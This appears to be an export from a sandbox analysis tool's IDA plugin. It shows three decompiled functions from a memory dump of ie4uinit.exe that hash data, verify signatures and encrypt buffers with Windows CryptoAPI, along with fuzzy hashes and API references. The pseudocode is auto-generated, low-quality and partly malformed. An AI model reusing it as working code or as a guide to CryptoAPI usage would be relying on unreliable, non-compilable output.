Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CryptHash$ErrorLast$CreateDataDestroyParam
String ID:
API String ID: 3383248918-3916222277
Opcode ID: 0f67868ec17e50d632dcbf79ea9a6bc02ab3efe34627aef37dbc41d5231ad76d
Instruction ID: 7e7f8dcc96c864b3e60e01d935aa3280d2d181f65d684a6168488ddb75b8d238
Opcode Fuzzy Hash: 0f67868ec17e50d632dcbf79ea9a6bc02ab3efe34627aef37dbc41d5231ad76d
Instruction Fuzzy Hash: 3521B632F1878296F740AB52E98876AA7A1FB44FDCF944035DA4D87648DFACD8009720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D74BC Relevance: 12.1, APIs: 8, Instructions: 94
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E00007FF77FF7319D74BC(void* __eax, long long __rbx, intOrPtr* __rcx, void* __rdx, void* __r9, void* _a8, void* _a16, char _a24, signed int _a40, long long _a48, signed int _a56) {
				signed long long _v40;
				signed int _v48;
				signed long long _v56;
				void* __rsi;
				void* __rbp;
				void* _t31;
				void* _t42;
				void* _t46;
				void* _t49;
				void* _t52;
				void* _t65;
				void* _t82;
				void* _t85;
				void* _t88;
				void* _t95;

				_t68 = __rbx;
				_t65 = _t88;
				 *((long long*)(_t65 + 0x10)) = __rbx;
				 *(_t65 + 0x18) = r8d;
				 *(_t65 + 8) =  *(_t65 + 8) & 0x00000000;
				 *(_t65 + 0x18) =  *(_t65 + 0x18) & 0x00000000;
				if ( *__rcx == 0) goto 0x319d7620;
				if (__rdx == 0) goto 0x319d7620;
				if (__r9 == 0) goto 0x319d7620;
				if (_a48 == 0) goto 0x319d7620;
				r9d = 0;
				r8d = 0;
				_v56 = _t65 + 8;
				__imp__CryptCreateHash(_t85);
				if (__eax == 0) goto 0x319d7608;
				r9d = 0;
				__imp__CryptSetHashParam();
				if (__eax == 0) goto 0x319d75e7;
				r8d = _a40;
				_v40 = _v40 & 0x00000000;
				_v56 =  &_a24;
				_t31 = E00007FF77FF7319D7AC8(_t52, __rbx, __rcx, __r9, __rdx, __r9,  &_v40, _t95, _t82);
				if (_t31 < 0) goto 0x319d75d4;
				_v48 = _v48 & 0x00000000;
				r8d = _a56;
				_v56 = _v56 & 0x00000000;
				__imp__CryptVerifySignatureW();
				if (_t31 == 0) goto 0x319d75b3;
				goto 0x319d75c7;
				_t42 =  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
				__imp__CryptDestroyKey();
				goto 0x319d75fb;
				E00007FF77FF7319D210C(_t68, 0x319ec71c);
				goto 0x319d75fb;
				_t46 =  <=  ? GetLastError() : _t34 & 0x0000ffff | 0x80070000;
				__imp__CryptDestroyHash();
				goto 0x319d761c;
				_t49 =  <=  ? GetLastError() : _t35 & 0x0000ffff | 0x80070000;
				if (_t49 >= 0) goto 0x319d762c;
				E00007FF77FF7319D210C(_t68, 0x319ec718);
				return _t49;
			}

0x7ff7319d74bc
0x7ff7319d74bc
0x7ff7319d74bf
0x7ff7319d74c3
0x7ff7319d74cf
0x7ff7319d74dd
0x7ff7319d74ec
0x7ff7319d74f5
0x7ff7319d74fe
0x7ff7319d750d
0x7ff7319d7517
0x7ff7319d751a
0x7ff7319d751d
0x7ff7319d7527
0x7ff7319d752f
0x7ff7319d753a
0x7ff7319d7544
0x7ff7319d754c
0x7ff7319d7552
0x7ff7319d755f
0x7ff7319d756d
0x7ff7319d7575
0x7ff7319d757c
0x7ff7319d757e
0x7ff7319d7588
0x7ff7319d759d
0x7ff7319d75a3
0x7ff7319d75ab
0x7ff7319d75b1
0x7ff7319d75c4
0x7ff7319d75cc
0x7ff7319d75d2
0x7ff7319d75e0
0x7ff7319d75e5
0x7ff7319d75f8
0x7ff7319d7600
0x7ff7319d7606
0x7ff7319d7619
0x7ff7319d761e
0x7ff7319d7627
0x7ff7319d763b

APIs

CryptCreateHash.ADVAPI32 ref: 00007FF7319D7527
CryptSetHashParam.ADVAPI32 ref: 00007FF7319D7544
CryptVerifySignatureW.ADVAPI32 ref: 00007FF7319D75A3
GetLastError.KERNEL32 ref: 00007FF7319D75B3
CryptDestroyKey.ADVAPI32 ref: 00007FF7319D75CC
GetLastError.KERNEL32 ref: 00007FF7319D75E7
CryptDestroyHash.ADVAPI32 ref: 00007FF7319D7600

Part of subcall function 00007FF7319D7AC8: CertOpenStore.CRYPT32 ref: 00007FF7319D7B2F
Part of subcall function 00007FF7319D7AC8: CertFindCertificateInStore.CRYPT32 ref: 00007FF7319D7B5C
Part of subcall function 00007FF7319D7AC8: CryptImportPublicKeyInfo.CRYPT32 ref: 00007FF7319D7BAF
Part of subcall function 00007FF7319D7AC8: CertFreeCertificateContext.CRYPT32 ref: 00007FF7319D7C04
Part of subcall function 00007FF7319D7AC8: CertCloseStore.CRYPT32 ref: 00007FF7319D7C14

GetLastError.KERNEL32 ref: 00007FF7319D7608

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Crypt$Cert$ErrorHashLastStore$CertificateDestroy$CloseContextCreateFindFreeImportInfoOpenParamPublicSignatureVerify
String ID:
API String ID: 1994448431-0
Opcode ID: e3bbdaa9551d28c78bda82fe27e2def9eade94d7959de9e02ddfd2479a78e0f8
Instruction ID: d88542fd84903cc55dfeef056ae4de5e724f6b6ff7dd921aa4403c1ae1036d53
Opcode Fuzzy Hash: e3bbdaa9551d28c78bda82fe27e2def9eade94d7959de9e02ddfd2479a78e0f8
Instruction Fuzzy Hash: 71416132E1C7C296E754AB65E844779A3A0FB84B9CFC08131DA8D86658DFBCE404DB31

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DC2F4 Relevance: 10.9, APIs: 7, Instructions: 421
COMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E00007FF77FF7319DC2F4(long long __rcx, long long __rdx, long long __r9, signed int __r10, long long _a8, short _a16, char _a24, signed int* _a32, signed int* _a40, intOrPtr* _a48, intOrPtr* _a56, signed int* _a64, char _a72, short _a80, char _a88, signed int _a96, intOrPtr _a104, signed int _a112, void* _a120, signed int _a128, signed int _a136, intOrPtr _a144, signed long long _a152, intOrPtr _a160) {
				long long _v80;
				signed long long _v88;
				long long _v96;
				signed long long _v104;
				long long _v120;
				long long _v128;
				long long _v136;
				long long _v144;
				signed long long _v152;
				long long _v160;
				signed int _v168;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				char _v188;
				signed int _v192;
				long long _v200;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				long long _v224;
				signed char _v228;
				signed int _v232;
				long long _v248;
				long long _v272;
				long long _v280;
				long long _v288;
				long long _v296;
				signed int _t186;
				signed int _t188;
				signed int _t189;
				signed int _t194;
				signed char _t196;
				signed int _t207;
				signed int _t210;
				char _t215;
				char _t216;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				void* _t266;
				long long _t287;
				signed long long _t291;
				signed long long _t297;
				void* _t302;
				void* _t303;
				void* _t311;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t327;
				void* _t333;
				void* _t334;
				void* _t335;
				long long _t337;
				long long _t340;
				long long _t345;
				signed int _t358;
				signed long long _t360;
				long long _t361;
				void* _t367;
				void* _t371;
				long long _t373;
				long long _t374;
				long long _t375;
				long long _t376;
				long long _t377;
				char* _t378;
				long long _t379;
				long long _t380;
				signed long long _t382;
				signed int _t383;
				signed long long _t384;
				long long _t387;
				signed long long _t390;
				intOrPtr _t402;
				signed long long _t406;
				signed long long _t407;
				long long _t408;
				long long _t415;
				long long _t417;
				signed long long _t418;
				void* _t421;
				long long _t422;
				void* _t425;
				long long _t426;
				void* _t429;
				long long _t430;
				intOrPtr _t431;

				_t287 = _t387;
				 *((long long*)(_t287 + 0x20)) = __r9;
				 *((intOrPtr*)(_t287 + 0x18)) = r8b;
				 *((long long*)(_t287 + 0x10)) = __rdx;
				 *((long long*)(_t287 + 8)) = __rcx;
				r12d = 3;
				_v160 = _t415;
				E00007FF77FF7319C1670();
				_t426 = _t287;
				_v136 = _t287;
				E00007FF77FF7319C1670();
				_t422 = _t287;
				_v128 = _t287;
				E00007FF77FF7319C1670();
				_t430 = _t287;
				_v120 = _t287;
				if (_t426 == 0) goto 0x319dc3b8;
				if (_t422 == 0) goto 0x319dc3a0;
				if (_t287 == 0) goto 0x319dc3a0;
				_v280 = _t287;
				_v288 = _t422;
				_v296 = _t426;
				_t402 = _a160;
				_t390 = _a152;
				E00007FF77FF7319DE150(r12d, __rcx, _a144, _t390, _t402);
				goto 0x319dc3e8;
				if (_t426 == 0) goto 0x319dc3b8;
				E00007FF77FF7319C1698(_t287, _t426);
				r14d = 0;
				_v136 = _t426;
				if (_t422 == 0) goto 0x319dc3d0;
				E00007FF77FF7319C1698(_t287, _t422);
				r13d = 0;
				_v128 = _t422;
				if (_t430 == 0) goto 0x319dc3e8;
				E00007FF77FF7319C1698(_t287, _t430);
				r15d = 0;
				_v120 = _t430;
				_v152 = _t382;
				_v232 = 0;
				r8d = 0;
				_t406 = __r10 | 0xffffffff;
				r9d = 0x80070216;
				if (0 < 0) goto 0x319dc438;
				_t333 =  *((intOrPtr*)(_t422 + _t390 * 8)) + _t382;
				_t289 =  >=  ? _t333 : _t406;
				_t383 =  >=  ? _t333 : _t406;
				asm("sbb edi, edi");
				_t228 = 0 & r9d;
				_v232 = _t228;
				if (_t390 + 1 - _t415 < 0) goto 0x319dc408;
				_v152 = _t383;
				if (_t228 < 0) goto 0x319dc486;
				_t358 = _t383;
				_t26 = _t383 + 3; // 0x18
				_t334 = _t26;
				_t291 =  >=  ? _t334 : _t406;
				_t384 = _t291;
				_v152 = _t291;
				asm("sbb edi, edi");
				_t229 = _t228 & r9d;
				_v232 = _t229;
				if (_t229 < 0) goto 0x319dc486;
				_t230 =  >  ? 0x80070057 : _t229;
				_v232 = _t230;
				_t407 = _a16;
				_v224 = _a8 + _t407;
				if (_t230 < 0) goto 0x319dca49;
				_t207 =  *_a32;
				_v212 = _t207;
				_v192 = _t207;
				r8d =  *_a40;
				_a112 = r8d;
				_a128 = r8d;
				_t215 =  *_a48;
				_v180 = _t215;
				_v188 = _t215;
				_t216 =  *_a56;
				_v176 = _t216;
				_v184 = _t216;
				_t297 = _a64;
				_t186 =  *_t297;
				_a136 = _t186;
				_v216 = _t186;
				r9d = 0;
				_v208 = r9d;
				if (r9d - 2 >= 0) goto 0x319dca26;
				if (_t230 < 0) goto 0x319dca26;
				_v168 = _v168 & 0x00000000;
				r12d = _t207;
				_v144 = _t415;
				_t335 = _t334 + _t415;
				_t299 =  >=  ? _t335 : _t297 | 0xffffffff;
				_v168 =  >=  ? _t335 : _t297 | 0xffffffff;
				if (_t335 - _t415 >= 0) goto 0x319dc585;
				_v232 = 0x80070570;
				 *0x319f4fe0 = 0x63d;
				r9d = r9d + 1;
				goto 0x319dc51e;
				_v168 = _t358;
				if (_t358 - _t415 <= 0) goto 0x319dc6a8;
				if (_t358 + _t384 - _t407 <= 0) goto 0x319dc69b;
				r9d = r10d;
				r9d = r9d - _t186 % _t407;
				_a136 = r9d;
				_v216 = r9d;
				_t337 = _a8 + _t358;
				_v96 = _t337;
				_t302 = _v224 - _t337;
				if (r9d - 2 < 0) goto 0x319dc60f;
				_t359 =  >  ? _t302 : _t358;
				_v88 = _t384;
				_t68 = _t384 - 1; // 0x14
				_t303 = _t68;
				if (_t303 - 0xfffe > 0) goto 0x319dc64f;
				_a80 = 0x15;
				r9d = 2;
				goto 0x319dc62c;
				_a24 = 0;
				_t360 =  >  ? _t303 :  >  ? _t302 : _t358;
				r9d = 1;
				__imp__memcpy_s(_t429, _t425, _t421, _t415, _t371, _t382);
				r9d = _a136;
				_t408 = _a16;
				r8d = _a112;
				_v168 = _t360;
				_t188 = _t402 +  &_a24;
				_t266 = _t188 - r8d;
				if (_t266 < 0) goto 0x319dc677;
				r8d = _t188;
				_a112 = _t188;
				_a128 = _t188;
				goto 0x319dc690;
				r8d = r8d | 0xffffffff;
				_a112 = r8d;
				_a128 = r8d;
				_v232 = 0x80070216;
				r9d = _v208;
				goto 0x319dc6b9;
				_v144 = _t408;
				goto 0x319dc6b9;
				if (_t266 != 0) goto 0x319dc6b9;
				_t417 =  ==  ? _t408 : _t408;
				_v144 = _t417;
				if (_t360 + _t384 - _t417 <= 0) goto 0x319dc7c0;
				if (r9d <= 0) goto 0x319dc6e3;
				_v232 = 0x8000ffff;
				 *0x319f4fe4 = 0x66c;
				goto 0x319dca26;
				if (_a88 == 0) goto 0x319dc705;
				_v232 = 0xc00ee062;
				 *0x319f4fe4 = 0x67a;
				goto 0x319dca26;
				_v248 = _t384 + _t384;
				_t93 =  &_v216; // 0x73
				_v272 = _t93;
				_t95 =  &_a128; // 0x1cb
				_v280 = _t95;
				_t97 =  &_v192; // 0x8b
				_v288 = _t97;
				_t99 =  &_v184; // 0x93
				_v296 = _t99;
				_t101 =  &_v188; // 0x8f
				_t361 = _t408;
				_t418 = _a8;
				_t189 = E00007FF77FF7319DD5F4(_t327, _t418, _t361,  &_a24, _t101, _t408);
				_v232 = _t189;
				_v80 = _t418 + _a16;
				_t210 = _v192;
				_v212 = _t210;
				r8d = _a128;
				_a112 = r8d;
				_v180 = _v188;
				_v176 = _v184;
				_a136 = _v216;
				r9d = _v208;
				goto 0x319dc57b;
				if (_t189 < 0) goto 0x319dc577;
				_t373 = _a8 + _t361;
				_v200 = _t373;
				_t120 = _t384 - 4; // 0x11
				_t340 = _t120;
				_a8 = _t340;
				_t311 = _v224 - _t373;
				_t362 =  >  ? _t311 : _t361;
				_t122 = _t340 - 1; // 0x10
				if (_t122 - 0xfffe > 0) goto 0x319dc832;
				_a96 = _t210;
				r9d = 2;
				__imp__memcpy_s();
				_t374 = _t373 + 2;
				_v200 = _t374;
				_a72 = 6;
				_t314 = _v224 - _t374;
				_t363 =  >  ? _t314 :  >  ? _t311 : _t361;
				r12d = 1;
				r9d = r12d;
				__imp__memcpy_s();
				_t375 = _t374 + _t418;
				_v200 = _t375;
				_t316 = _v224 - _t375;
				_t364 =  >  ? _t316 :  >  ? _t314 :  >  ? _t311 : _t361;
				_t131 = _t418 + 0xe; // 0x80070224
				r9d = _t131;
				__imp__memcpy_s();
				_t376 = _t375 + 0xf;
				_v200 = _t376;
				_t318 = _v224 - _t376;
				_t365 =  >  ? _t318 :  >  ? _t316 :  >  ? _t314 :  >  ? _t311 : _t361;
				r9d = r12d;
				__imp__memcpy_s();
				_t377 = _t376 + _t418;
				_v200 = _t377;
				r12d = 0;
				_v104 = _t418;
				if (_t418 - _v160 >= 0) goto 0x319dc94c;
				if (_t426 == 0) goto 0x319dc948;
				_t345 =  *((intOrPtr*)(_t422 + _t418 * 8));
				_a16 = _t345;
				_t320 = _v224 - _t377;
				_t366 =  >  ? _t320 :  >  ? _t318 :  >  ? _t316 :  >  ? _t314 :  >  ? _t311 : _t361;
				if (_t345 == 0) goto 0x319dc935;
				__imp__memcpy_s();
				_t378 = _t377 + _a16;
				_v200 = _t378;
				 *_t378 = 0;
				_t379 = _t378 + 1;
				_v200 = _t379;
				goto 0x319dc8d4;
				goto 0x319dc8fb;
				_t367 =  >  ? _v224 - _t379 :  >  ? _t320 :  >  ? _t318 :  >  ? _t316 :  >  ? _t314 :  >  ? _t311 : _t361;
				_t149 = _t384 - 4; // 0x11
				_t150 = _t149 - 1; // 0x10
				if (_t150 - 0xfffe > 0) goto 0x319dc998;
				_a16 = 0;
				r9d = 2;
				__imp__memcpy_s();
				_t380 = _t379 + 2;
				_v200 = _t380;
				_t194 = _a112 + 0x15;
				_a128 = _t194;
				 *_a48 = _v180;
				 *_a56 = _v176;
				 *_a32 = _v212;
				 *_a40 = _t194;
				 *_a64 = _a136;
				_v232 = 0;
				_v228 = dil;
				_t196 =  *((intOrPtr*)(_a104 + 0xe));
				_v228 = _t196;
				if (( *0x319f4e80 & 0x20000000) == 0) goto 0x319dca26;
				r9d = _t196 & 0x000000ff;
				_t172 = _t380 + 6; // 0x6
				r8d = _t172;
				E00007FF77FF7319DACB4( *0x319f4e80 & 0x20000000, _a64);
				_v232 = 0x80070570;
				_t431 = _v120;
				if (_t431 == 0) goto 0x319dca90;
				if ( *((char*)(_t384 + _t431)) == 0) goto 0x319dca70;
				E00007FF77FF7319C1698(_v160,  *((intOrPtr*)(_v136 + _t384 * 8)));
				if (_t384 + 1 - _v160 < 0) goto 0x319dca58;
				E00007FF77FF7319C1698(_v160, _v136);
				E00007FF77FF7319C1698(_v160, _v128);
				E00007FF77FF7319C1698(_v160, _t431);
				return 0x80070570;
			}

0x7ff7319dc2f4
0x7ff7319dc2f7
0x7ff7319dc2fb
0x7ff7319dc2ff
0x7ff7319dc303
0x7ff7319dc318
0x7ff7319dc31e
0x7ff7319dc32b
0x7ff7319dc330
0x7ff7319dc333
0x7ff7319dc340
0x7ff7319dc345
0x7ff7319dc348
0x7ff7319dc353
0x7ff7319dc358
0x7ff7319dc35b
0x7ff7319dc366
0x7ff7319dc36b
0x7ff7319dc370
0x7ff7319dc372
0x7ff7319dc377
0x7ff7319dc37c
0x7ff7319dc381
0x7ff7319dc389
0x7ff7319dc399
0x7ff7319dc39e
0x7ff7319dc3a3
0x7ff7319dc3a8
0x7ff7319dc3ad
0x7ff7319dc3b0
0x7ff7319dc3bb
0x7ff7319dc3c0
0x7ff7319dc3c5
0x7ff7319dc3c8
0x7ff7319dc3d3
0x7ff7319dc3d8
0x7ff7319dc3dd
0x7ff7319dc3e0
0x7ff7319dc3ed
0x7ff7319dc3f7
0x7ff7319dc3fb
0x7ff7319dc3fe
0x7ff7319dc402
0x7ff7319dc40a
0x7ff7319dc414
0x7ff7319dc41d
0x7ff7319dc421
0x7ff7319dc427
0x7ff7319dc429
0x7ff7319dc42c
0x7ff7319dc436
0x7ff7319dc438
0x7ff7319dc442
0x7ff7319dc444
0x7ff7319dc447
0x7ff7319dc447
0x7ff7319dc451
0x7ff7319dc455
0x7ff7319dc458
0x7ff7319dc463
0x7ff7319dc465
0x7ff7319dc468
0x7ff7319dc46e
0x7ff7319dc47f
0x7ff7319dc482
0x7ff7319dc486
0x7ff7319dc499
0x7ff7319dc4a0
0x7ff7319dc4ae
0x7ff7319dc4b0
0x7ff7319dc4b4
0x7ff7319dc4c3
0x7ff7319dc4c6
0x7ff7319dc4ce
0x7ff7319dc4de
0x7ff7319dc4e0
0x7ff7319dc4e7
0x7ff7319dc4f6
0x7ff7319dc4f8
0x7ff7319dc4ff
0x7ff7319dc506
0x7ff7319dc50e
0x7ff7319dc510
0x7ff7319dc517
0x7ff7319dc51b
0x7ff7319dc51e
0x7ff7319dc527
0x7ff7319dc52f
0x7ff7319dc535
0x7ff7319dc53e
0x7ff7319dc541
0x7ff7319dc54c
0x7ff7319dc556
0x7ff7319dc55a
0x7ff7319dc562
0x7ff7319dc569
0x7ff7319dc56d
0x7ff7319dc57b
0x7ff7319dc583
0x7ff7319dc58a
0x7ff7319dc595
0x7ff7319dc5a2
0x7ff7319dc5a8
0x7ff7319dc5ab
0x7ff7319dc5ae
0x7ff7319dc5b6
0x7ff7319dc5c3
0x7ff7319dc5c6
0x7ff7319dc5d1
0x7ff7319dc5da
0x7ff7319dc5df
0x7ff7319dc5e3
0x7ff7319dc5eb
0x7ff7319dc5eb
0x7ff7319dc5f5
0x7ff7319dc5f7
0x7ff7319dc5ff
0x7ff7319dc60d
0x7ff7319dc60f
0x7ff7319dc61a
0x7ff7319dc61e
0x7ff7319dc62c
0x7ff7319dc637
0x7ff7319dc63f
0x7ff7319dc647
0x7ff7319dc651
0x7ff7319dc659
0x7ff7319dc65d
0x7ff7319dc660
0x7ff7319dc662
0x7ff7319dc665
0x7ff7319dc66c
0x7ff7319dc675
0x7ff7319dc677
0x7ff7319dc67b
0x7ff7319dc683
0x7ff7319dc690
0x7ff7319dc694
0x7ff7319dc699
0x7ff7319dc69e
0x7ff7319dc6a6
0x7ff7319dc6a8
0x7ff7319dc6ad
0x7ff7319dc6b1
0x7ff7319dc6c0
0x7ff7319dc6c9
0x7ff7319dc6d0
0x7ff7319dc6d4
0x7ff7319dc6de
0x7ff7319dc6eb
0x7ff7319dc6f2
0x7ff7319dc6f6
0x7ff7319dc700
0x7ff7319dc709
0x7ff7319dc70e
0x7ff7319dc713
0x7ff7319dc718
0x7ff7319dc720
0x7ff7319dc725
0x7ff7319dc72d
0x7ff7319dc732
0x7ff7319dc73a
0x7ff7319dc73f
0x7ff7319dc747
0x7ff7319dc74a
0x7ff7319dc755
0x7ff7319dc75c
0x7ff7319dc76c
0x7ff7319dc774
0x7ff7319dc77b
0x7ff7319dc77f
0x7ff7319dc787
0x7ff7319dc796
0x7ff7319dc7a4
0x7ff7319dc7af
0x7ff7319dc7b6
0x7ff7319dc7bb
0x7ff7319dc7c2
0x7ff7319dc7d0
0x7ff7319dc7d3
0x7ff7319dc7db
0x7ff7319dc7db
0x7ff7319dc7df
0x7ff7319dc7ea
0x7ff7319dc7f2
0x7ff7319dc7f6
0x7ff7319dc800
0x7ff7319dc802
0x7ff7319dc80a
0x7ff7319dc81b
0x7ff7319dc821
0x7ff7319dc825
0x7ff7319dc832
0x7ff7319dc83d
0x7ff7319dc845
0x7ff7319dc849
0x7ff7319dc84f
0x7ff7319dc85d
0x7ff7319dc863
0x7ff7319dc866
0x7ff7319dc873
0x7ff7319dc87b
0x7ff7319dc87f
0x7ff7319dc87f
0x7ff7319dc88f
0x7ff7319dc895
0x7ff7319dc899
0x7ff7319dc8a6
0x7ff7319dc8ae
0x7ff7319dc8b2
0x7ff7319dc8c0
0x7ff7319dc8c6
0x7ff7319dc8c9
0x7ff7319dc8d1
0x7ff7319dc8d4
0x7ff7319dc8e4
0x7ff7319dc8f0
0x7ff7319dc8f6
0x7ff7319dc8fb
0x7ff7319dc908
0x7ff7319dc910
0x7ff7319dc917
0x7ff7319dc91f
0x7ff7319dc925
0x7ff7319dc92d
0x7ff7319dc935
0x7ff7319dc938
0x7ff7319dc93b
0x7ff7319dc946
0x7ff7319dc94a
0x7ff7319dc959
0x7ff7319dc95d
0x7ff7319dc961
0x7ff7319dc96b
0x7ff7319dc96d
0x7ff7319dc975
0x7ff7319dc986
0x7ff7319dc98c
0x7ff7319dc990
0x7ff7319dc99f
0x7ff7319dc9a1
0x7ff7319dc9b7
0x7ff7319dc9c8
0x7ff7319dc9d6
0x7ff7319dc9e0
0x7ff7319dc9f1
0x7ff7319dc9f5
0x7ff7319dc9f9
0x7ff7319dca06
0x7ff7319dca09
0x7ff7319dca17
0x7ff7319dca19
0x7ff7319dca1d
0x7ff7319dca1d
0x7ff7319dca21
0x7ff7319dca2d
0x7ff7319dca41
0x7ff7319dca4c
0x7ff7319dca5d
0x7ff7319dca63
0x7ff7319dca76
0x7ff7319dca7b
0x7ff7319dca83
0x7ff7319dca8b
0x7ff7319dcaa3

APIs

Part of subcall function 00007FF7319C1670: GetProcessHeap.KERNEL32 ref: 00007FF7319C1679

memcpy_s.MSVCRT ref: 00007FF7319DC62C

Part of subcall function 00007FF7319DE150: StrCmpNIA.SHLWAPI ref: 00007FF7319DE214

memcpy_s.MSVCRT ref: 00007FF7319DC81B
memcpy_s.MSVCRT ref: 00007FF7319DC85D
memcpy_s.MSVCRT ref: 00007FF7319DC88F
memcpy_s.MSVCRT ref: 00007FF7319DC8C0
memcpy_s.MSVCRT ref: 00007FF7319DC91F
memcpy_s.MSVCRT ref: 00007FF7319DC986

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: memcpy_s$HeapProcess
String ID:
API String ID: 1569082731-0
Opcode ID: e90e0d939ad4ac896f3863ace0b5f854ec8779e4bb849f516ecffe100afabdff
Instruction ID: 4ed9ed712c6b22a862e4bdd65ceff76cb9235e9d1dc7c11d3a067fc345000c39
Opcode Fuzzy Hash: e90e0d939ad4ac896f3863ace0b5f854ec8779e4bb849f516ecffe100afabdff
Instruction Fuzzy Hash: 94125772A0DBC196E774DB15E5047AAF7A5FB88794F90412ACA8D43B58DF7CE050DB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DE80C Relevance: 10.6, APIs: 7, Instructions: 85
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00007FF77FF7319DE80C(void* __eax, long long __rbx, void* __rcx, long long __rsi, long long _a16, long long _a24) {
				void* _v8;
				signed int _v16;
				char _v48;
				char _v56;
				intOrPtr _v72;
				long long _v80;
				long long _v88;
				intOrPtr _t30;
				long _t32;
				long _t35;
				void* _t43;
				signed long long _t62;
				signed long long _t63;
				void* _t78;
				void* _t80;
				void* _t82;

				_t66 = __rbx;
				_a16 = __rbx;
				_a24 = __rsi;
				_t83 = _t82 - 0x70;
				_t62 =  *0x319f4658; // 0x8be7dd1f02a
				_t63 = _t62 ^ _t82 - 0x00000070;
				_v16 = _t63;
				_t80 = __rcx;
				__imp__CryptGenRandom();
				if (__eax == 0) goto 0x319de8f7;
				r8d = 0;
				if (E00007FF77FF7319DEA9C(__rbx, __rcx,  &_v48, __rcx, __rcx + 0x50) < 0) goto 0x319de92e;
				r8b = dil;
				if (E00007FF77FF7319DEA9C(_t66, _t80,  &_v48, _t80, _t80 + 0x58) < 0) goto 0x319de92e;
				E00007FF77FF7319C1670();
				 *(_t80 + 0x60) = _t63;
				if (_t63 == 0) goto 0x319de8f0;
				_t13 = _t78 + 0xf; // 0x10
				r9d = _t13;
				__imp__memcpy_s();
				_t30 =  *((intOrPtr*)(_t80 + 0x48));
				r9d = 0;
				r8d = 1;
				_v72 = _t30;
				_v56 = 0x10;
				_v80 =  &_v56;
				_v88 =  *(_t80 + 0x60);
				__imp__CryptEncrypt();
				if (_t30 != 0) goto 0x319de92e;
				GetLastError();
				goto 0x319de902;
				goto 0x319de92e;
				_t32 = GetLastError();
				_t33 =  ==  ? 1 : _t32;
				_t58 =  ==  ? 1 : _t32;
				if (( ==  ? 1 : _t32) > 0) goto 0x319de91a;
				_t43 =  ==  ? 1 : GetLastError();
				goto 0x319de92e;
				_t35 = GetLastError();
				_t36 =  ==  ? 1 : _t35;
				_t44 = ( ==  ? 1 : _t35) & 0x0000ffff;
				_t45 = ( ==  ? 1 : _t35) & 0x0000ffff | 0x80070000;
				_t37 = ( ==  ? 1 : _t35) & 0x0000ffff | 0x80070000;
				return E00007FF77FF7319E38D0(( ==  ? 1 : _t35) & 0x0000ffff | 0x80070000,  *((intOrPtr*)(_t80 + 0x48)), _v16 ^ _t83);
			}

0x7ff7319de80c
0x7ff7319de80c
0x7ff7319de811
0x7ff7319de817
0x7ff7319de81b
0x7ff7319de822
0x7ff7319de825
0x7ff7319de82a
0x7ff7319de83b
0x7ff7319de843
0x7ff7319de84d
0x7ff7319de861
0x7ff7319de870
0x7ff7319de884
0x7ff7319de88d
0x7ff7319de892
0x7ff7319de899
0x7ff7319de89e
0x7ff7319de89e
0x7ff7319de8aa
0x7ff7319de8b0
0x7ff7319de8b3
0x7ff7319de8ba
0x7ff7319de8bd
0x7ff7319de8c8
0x7ff7319de8d0
0x7ff7319de8d9
0x7ff7319de8de
0x7ff7319de8e6
0x7ff7319de8e8
0x7ff7319de8ee
0x7ff7319de8f5
0x7ff7319de8f7
0x7ff7319de904
0x7ff7319de907
0x7ff7319de909
0x7ff7319de915
0x7ff7319de918
0x7ff7319de91a
0x7ff7319de922
0x7ff7319de925
0x7ff7319de928
0x7ff7319de92e
0x7ff7319de94e

APIs

CryptGenRandom.ADVAPI32 ref: 00007FF7319DE83B
memcpy_s.MSVCRT ref: 00007FF7319DE8AA
CryptEncrypt.ADVAPI32 ref: 00007FF7319DE8DE
GetLastError.KERNEL32 ref: 00007FF7319DE8E8
GetLastError.KERNEL32 ref: 00007FF7319DE8F7
GetLastError.KERNEL32 ref: 00007FF7319DE90B

Part of subcall function 00007FF7319DEA9C: memcpy_s.MSVCRT ref: 00007FF7319DEADF
Part of subcall function 00007FF7319DEA9C: CryptCreateHash.ADVAPI32(?,?,?,?,?,00007FF7319DE85D), ref: 00007FF7319DEAFE
Part of subcall function 00007FF7319DEA9C: CryptHashData.ADVAPI32(?,?,?,?,?,00007FF7319DE85D), ref: 00007FF7319DEB1B
